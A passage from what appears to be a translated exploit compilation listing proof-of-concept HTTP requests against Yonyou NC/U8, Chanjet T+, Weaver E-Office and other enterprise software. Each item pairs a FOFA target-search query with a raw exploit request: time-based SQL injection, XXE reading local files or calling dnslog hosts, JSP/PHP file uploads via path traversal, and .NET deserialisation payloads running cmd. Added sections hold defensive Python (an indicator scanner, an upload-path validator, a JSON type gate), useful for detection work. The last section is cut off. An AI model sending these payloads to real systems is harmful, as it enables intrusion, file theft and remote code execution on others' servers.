User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Follow-up request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

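The requests in items 22 to 46 share a handful of payload shapes that a defender can match without knowing the product-specific paths: JNDI lookup strings, fastjson and AjaxPro type discriminators, MSSQL WAITFOR DELAY and Oracle DBMS_PIPE.RECEIVE_MESSAGE time-based blind injection, MySQL extractvalue error-based injection, DOCTYPE/ENTITY declarations in request bodies, and JSP or PHP uploads with path traversal. The scanner below is an added example written for this page, not code from the original article or from any vendor named above. It parses raw HTTP requests of the kind pasted here, URL-decodes the request line and form-encoded bodies, and reports which indicators fire. The sample requests are constructed for the example (hosts and callback domains are placeholders), and the indicator set is a starting point to tune against your own traffic, not a complete signature list.

```python
import re
from urllib.parse import unquote_plus

# Indicator regexes distilled from the request POCs listed above. They run over the
# URL-decoded request line plus the (form-decoded) body, so "+" and %27 encodings are
# normalised before matching.
INDICATORS = {
    "jndi_lookup":        re.compile(r"\$\{\s*jndi:", re.I),
    "fastjson_autotype":  re.compile(r'"@type"\s*:\s*"(?:com\.alibaba\.fastjson|java\.net\.URL)', re.I),
    "dotnet_type_gadget": re.compile(r'"__type"\s*:\s*"System\.(?:Windows\.Data\.ObjectDataProvider|Diagnostics\.Process)', re.I),
    "mssql_time_blind":   re.compile(r"waitfor\s+delay\s+'?\d+:\d+:\d+", re.I),
    "oracle_time_blind":  re.compile(r"dbms_pipe\.receive_message\s*\(", re.I),
    "mysql_error_based":  re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "xxe_doctype":        re.compile(r"<!DOCTYPE[^>]*?(?:<!ENTITY|SYSTEM)", re.I),
    "jsp_path_traversal": re.compile(r'(?:\.\.[\\/]|[\\/]webapps[\\/])[^\r\n"]*\.jsp\b', re.I),
    "jsp_scriptlet":      re.compile(r"<%\s*out\.print", re.I),
    "script_file_upload": re.compile(r'filename="[^"]*\.(?:jspx?|php|aspx?|ashx)\s*"', re.I),
}


def parse_raw_request(raw):
    """Split a raw HTTP request (as pasted above) into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, *_ = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def scan_raw_request(raw):
    """Return the set of indicator names that fire on one raw request."""
    method, path, headers, body = parse_raw_request(raw)
    ctype = headers.get("content-type", "")
    # Only form bodies are percent-encoded; JSON, XML and multipart bodies are matched as-is.
    decoded_body = unquote_plus(body) if "x-www-form-urlencoded" in ctype else body
    haystack = unquote_plus(path) + "\n" + decoded_body
    return {name for name, rx in INDICATORS.items() if rx.search(haystack)}


def scan_all(samples):
    """Map each sample name to the sorted list of indicators that fired."""
    return {name: sorted(scan_raw_request(raw)) for name, raw in samples.items()}


# Constructed sample requests modelled on the POCs above (hosts and callbacks are placeholders).
SAMPLES = {
    "dahua_log4j": 'POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1\nHost: target\nContent-Type: application/json\n\n'
                   '{"loginName":"${jndi:ldap://attacker.example/a}"}',
    "nc_linkvoucher": "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1\nHost: target\n\n",
    "nc_showcontent": "GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1\nHost: target\n\n",
    "nc_accept_jsp": 'POST /aim/equipmap/accept.jsp HTTP/1.1\nHost: target\nContent-Type: multipart/form-data; boundary=x\n\n'
                     '--x\nContent-Disposition: form-data; name="upload"; filename="a.txt"\n\n<% out.println(1); %>\n'
                     '--x\nContent-Disposition: form-data; name="fname"\n\n\\webapps\\nc_web\\a.jsp\n--x--',
    "grp_ufgovbank_xxe": 'POST /ufgovbank HTTP/1.1\nHost: target\nContent-Type: application/x-www-form-urlencoded\n\n'
                         'reqData=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+foo+SYSTEM+%22http%3A%2F%2Fattacker.example%22%3E&signData=1',
    "tplus_ajaxpro": 'POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1\n'
                     'Host: target\nContent-Type: application/json\n\n'
                     '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework","MethodName":"Start"}}',
    "smart_school_sqli": 'POST /course/filterRecords/ HTTP/1.1\nHost: target\nContent-Type: application/x-www-form-urlencoded\n\n'
                         'searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23',
    "benign_login": 'POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1\nHost: target\nContent-Type: application/json\n\n'
                    '{"loginName":"alice"}',
}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(f"{name:20s} {', '.join(hits) or '-'}")
```

Feed it full requests from a reverse proxy, WAF or packet capture rather than plain access logs, since most of the payloads above travel in the body; the time-based injection indicators in particular only matter if the endpoint also shows the matching delay in its response time.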
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Resulting file location (note the trailing space in the filename above, which the server drops):
http://x.x.x.x/tmpfile/updB3CB.tmp.php

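Items 24, 35, 42, 48 and 49 are the same defect seen five times: the server trusts a client-supplied file name (or a separate fname parameter) for both the on-disk path and the extension, so a traversal prefix such as ../../webapps/nc_web/ or a trailing-space name like "s.php " lands an executable file where the web tier will run it. The Python below is an added example, not code from the original page or from Yonyou; the upload root, the extension allow-list and the sample names are assumptions made for the example. It puts the vulnerable join next to a hardened version that keeps only the basename, strips trailing dots and spaces before looking at the extension, refuses executable extensions anywhere in the name, and re-checks that the resolved path stays under the upload root.

```python
import posixpath
import re
import unicodedata

# Allowed extensions for the upload endpoint (an assumption for this example).
ALLOWED_EXTS = {"jpg", "jpeg", "png", "pdf", "txt"}
# Server-executable extensions: rejected anywhere in the name, so head.jsp.txt is refused too.
EXECUTABLE_EXTS = {"jsp", "jspx", "php", "phtml", "asp", "aspx", "ashx"}
UPLOAD_ROOT = "/srv/app/upload"   # hypothetical storage directory


class UploadRejected(ValueError):
    pass


def vulnerable_target_path(upload_root, client_name):
    """The pattern behind the upload POCs above: the client-controlled name (or fname
    parameter) is joined onto the storage directory as-is. Backslashes are treated as
    separators the way Windows does; an absolute or ../ name escapes the root."""
    name = client_name.replace("\\", "/")
    return posixpath.normpath(posixpath.join(upload_root, name))


def safe_upload_path(upload_root, client_name):
    """Hardened counterpart: keep only a sanitised basename, allow-list the extension,
    and verify the final path is still under upload_root."""
    # 1. Only the last path component is honoured; '..' and absolute prefixes are dropped.
    name = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    # 2. Trailing spaces and dots are removed by Windows and by some filters ("s.php "
    #    lands on disk as s.php), so strip them *before* checking the extension.
    name = unicodedata.normalize("NFKC", name).strip().rstrip(". ")
    # 3. NUL and other control characters (null-byte truncation tricks) are refused outright.
    if not name or name in {".", ".."} or any(ord(c) < 32 for c in name):
        raise UploadRejected("empty or control-character filename")
    # 4. Every dot-separated suffix is checked: the last must be allowed, none executable.
    parts = name.lower().split(".")
    if len(parts) < 2:
        raise UploadRejected("no extension")
    suffixes = parts[1:]
    if suffixes[-1] not in ALLOWED_EXTS or any(s in EXECUTABLE_EXTS for s in suffixes):
        raise UploadRejected(f"extension not allowed: {name}")
    # 5. Restrict the character set; in production also replace the basename with a
    #    server-generated random one so the client never chooses the stored name.
    if not re.fullmatch(r"[A-Za-z0-9_\-.]{1,100}", name):
        raise UploadRejected("illegal characters in filename")
    target = posixpath.normpath(posixpath.join(upload_root, name))
    # 6. Belt and braces: the resolved path must remain inside the upload root.
    if posixpath.commonpath([upload_root, target]) != upload_root:
        raise UploadRejected("path escapes upload root")
    return target


def classify(client_name, upload_root=UPLOAD_ROOT):
    """Return ('ok', path) or ('rejected', reason) for one client-supplied name."""
    try:
        return "ok", safe_upload_path(upload_root, client_name)
    except UploadRejected as exc:
        return "rejected", str(exc)


# Names taken from or modelled on the requests above (constructed; random IDs shortened).
DEMO_NAMES = [
    "report.pdf",
    "s.php ",                        # swfupload.php: trailing space
    "head.jsp.txt",                  # double extension
    "../../webapps/nc_web/1.jsp",    # importhttpscer-style traversal
    "\\webapps\\nc_web\\x.jsp",      # accept.jsp fname parameter
    "a\x00.jsp.png",                 # null-byte truncation
    "../../etc/passwd",              # no extension at all
]

if __name__ == "__main__":
    for n in DEMO_NAMES:
        print(f"{n!r:32s} vulnerable={vulnerable_target_path(UPLOAD_ROOT, n)!r:36s} hardened={classify(n)}")
```

Note how posixpath.join discards the root entirely when the client name starts with a separator, which is exactly what puts the accept.jsp payload under webapps/nc_web; the hardened version never lets a separator from the client survive.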
50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 (Yunshikong) social business ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service path traversal file read (the source lists this entry as an arbitrary file upload, but the request below reads /etc/passwd)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It runs a command that writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL; the marker file is served back if the command ran:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: using that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

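Items 54 and 56 (and the fastjson entry in item 23) work because the deserialiser honours a type discriminator in attacker-controlled JSON (`__type` for AjaxPro on .NET, `@type` for fastjson) and instantiates whatever class it names, here ObjectDataProvider wrapping Process.Start. The gate below is an added, generic example written for this page, not code from Chanjet, AjaxPro or fastjson: it walks the parsed JSON before it reaches any framework deserialiser and rejects the document unless every discriminator names an explicitly allowed type. The sample payloads are constructed from the requests above with placeholder callback hosts, and the com.example.dto.Order type is hypothetical.

```python
import json

# Keys that switch on type-driven (polymorphic) deserialisation in the stacks seen above:
# fastjson's "@type" and the AjaxPro/.NET "__type". "$type" (Json.NET) is included for
# completeness. Any of them in untrusted input is a red flag unless explicitly allowed.
TYPE_KEYS = {"@type", "__type", "$type"}


def find_type_keys(node, path="$"):
    """Yield (json_path, key, type_name) for every type discriminator in a parsed document."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in TYPE_KEYS:
                # Drop .NET assembly qualification ("System.Diagnostics.Process, System, ...").
                yield path, key, str(value).split(",")[0].strip()
            yield from find_type_keys(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_type_keys(value, f"{path}[{i}]")


def type_key_paths(raw):
    """JSON paths of every discriminator in raw, for logging or alerting."""
    return [path for path, _, _ in find_type_keys(json.loads(raw))]


def gate(raw, allowed_types=frozenset()):
    """Parse JSON and return ('ok', doc) only if every type discriminator names a type in
    allowed_types; otherwise ('rejected', reason). Malformed JSON is rejected too, which
    also covers the deliberately malformed fastjson probe shown in item 23."""
    try:
        doc = json.loads(raw)
    except ValueError as exc:
        return "rejected", f"malformed JSON: {exc}"
    for path, key, type_name in find_type_keys(doc):
        if type_name not in allowed_types:
            return "rejected", f"{key}={type_name!r} at {path} is not an allowed type"
    return "ok", doc


# Constructed inputs modelled on the requests above (callback hosts are placeholders).
TPLUS_RCE = """{
  "storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
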